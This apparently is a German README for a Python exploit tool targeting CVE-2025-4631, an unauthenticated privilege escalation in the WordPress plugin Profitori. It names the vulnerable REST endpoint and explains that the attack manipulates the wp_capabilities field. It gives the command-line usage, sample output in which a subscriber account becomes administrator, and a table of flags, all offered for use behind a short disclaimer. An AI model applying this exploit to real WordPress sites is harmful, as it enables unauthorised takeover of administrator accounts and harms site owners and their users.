
Profitori 2.0.6.0 - 2.1.1.3 - Fehlende Autorisierung zu nicht authentifizierter Privilegieneskalation
Profitori Plugin (Versionen 2.0.6.0 bis 2.1.1.3) ist anfällig für Rechteausweitung ohne Authentifizierung aufgrund einer fehlenden Berechtigungsprüfung im Endpunkt /wp-json/stocktend/v1/stocktend_object. Dies ermöglicht entfernten Angreifern, die Berechtigungen vorhandener Benutzer zu erweitern (oder neue zu erstellen), indem sie das Metafeld wp_capabilities direkt manipulieren.
Dieser Python-Exploit automatisiert den Rechteausweitungsprozess wie folgt:
readme.txt.Falls die Versionsprüfung fehlschlägt, fährt der Exploit vorsichtig mit einer Warnung fort.

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requests BibliothekInstallation über:
pip install requests
Dieses Tool wird ausschließlich für Bildungs- und autorisierte Testzwecke bereitgestellt. Jeglicher Missbrauch dieses Exploits gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist strengstens untersagt. Der Ersteller übernimmt keine Verantwortung für Schäden oder rechtliche Konsequenzen, die aus unsachgemäßer Verwendung entstehen.
VON: Nxploited ( Khaled_Alenazi )
| Flag | Beschreibung | Erforderlich |
|---|
-u, --url | 🌐 Basis-URL der WordPress-Site | ✅ Ja |
-id | 🆔 ID des zu erhöhenden Benutzers | ✅ Ja |
--email | 📧 Fiktive E-Mail zur Anzeige | ❌ Nein |
--name | 👤 Anzeigename | ❌ Nein |
--url_field | 🔗 Benutzer-URL-Feld | ❌ Nein |
--verbose | 🔍 Vollständige JSON-Antwort ausgeben | ❌ Nein |